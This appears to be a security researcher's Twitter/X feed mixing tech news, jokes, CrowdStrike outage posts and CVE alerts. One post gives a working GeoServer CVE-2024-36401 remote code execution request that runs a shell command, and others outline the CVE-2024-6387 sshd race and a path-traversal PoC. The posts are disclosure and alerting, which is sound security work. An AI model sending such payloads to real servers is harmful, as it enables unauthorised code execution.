Nightbane / Matt Keeley
@Nightbanes
Founder of ProDefense | Nerd who likes breaking web applications. | ex @bishopfox
New from 404 Media: police freaking out at iPhones stored for forensic examination mysteriously rebooting themselves. This makes brute forcing much harder. Cops hypothesize Apple pushed an update that tells nearby iPhones to reboot if not on phone network 404media.co/police-freak-o…
ever since i was young i dreamed of creating shareholder value via ai powered operating systems for the modern enterprise cloud
Uber moves to MySQL 8.0, reducing 94% of the lock time. Thanks to MySQL 8's new B+Tree locking model which I talked about in another post. First time I see the payoffs of that impressive design in a production shop.
A girl was scammed out of $1000 when she scanned a QR code for parking, but it turned out to be a fake sticker 😬
For beginners and professionals, OS-Surveillance offers AI-powered satellite image analysis. Simply zoom in and put marker on the location you want to research, and the AI will do the rest. Best of all, it's free for everyone. Register now and try it on os-surveillance.io…
Bird-shaped drone used by the Marines.
Dependency is replaced by one-liner, weekly traffic is reduced by 440GB
This year's Crowdstrike booth at Blackhat:
Just released SquatSquasher: Automated detection of typosquatting domains! - Generates domain variations - Checks registration status - Analyses suspicious domains - Bulk domain checking Born from a work project, now available for all. Check it out: github.com/Stuub/SquatSqu…
This strange tweet got >25k retweets. The author sounds confident, and he uses lots of hex and jargon. There are red flags though... like what's up with the DEI stuff, and who says "stack trace dump"? Let's take a closer look... 🧵1/n
Crowdstrike : its fine u just have to manually visit the PC boot it into safe mode and remove a sys file US Organization with 50,000 pcs and a completely outsourced IT department in Bangalore : what
Hit by @CrowdStrike and just found out you don't have the necessary BitLocker Recovery keys? We might have a solution for you 😜😇 In our two day hardware training at @BlackHatEvents we teach how to break BitLocker TPM only setups by sniffing the communication between the CPU…
Donald Trump was shot at during recent Trump rally.
This... Just creates a WordPress user with the name "admin"... There is no vulnerability here. This could only be an issue if the site is configured to set every new user role as an Administrator but that would be exceedingly rare and it wouldn't matter what your username is.
🚨Alert🚨CVE-2024-36401 (CVSS 9.8): GeoServer Unauthenticated Remote Code Execution in Evaluating Property Name Expressions 🔥PoC: github.com/vulhub/vulhub/… 📊6.4K+ Services are found on hunter.how 🔗Hunter Link: hunter.how/list?searchVal… 👇Search Query Hunter:…
CVE-2024-36401 POC: GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1 Host: your-ip:8080 From: github.com/vulhub/vulhub/… #cve #poc
#CVE_2024_6387 Finally, if sshd cannot be updated or recompiled, this signal handler race condition can be fixed by simply setting LoginGraceTime to 0 in the configuration file. This makes sshd vulnerable to a denial of service (the exhaustion of all MaxStartups connections),…
#CVE_2024_6387 With this change in strategy, it takes ~10,000 tries on average to win the race condition; i.e., with 100 connections (MaxStartups) accepted per 120 seconds (LoginGraceTime), it takes ~3-4 hours on average to win the race condition, and ~6-8 hours to obtain a…
🚨PoC RELEASED🚨CVE-2024-28995; Automated Path Traversal & Local File Read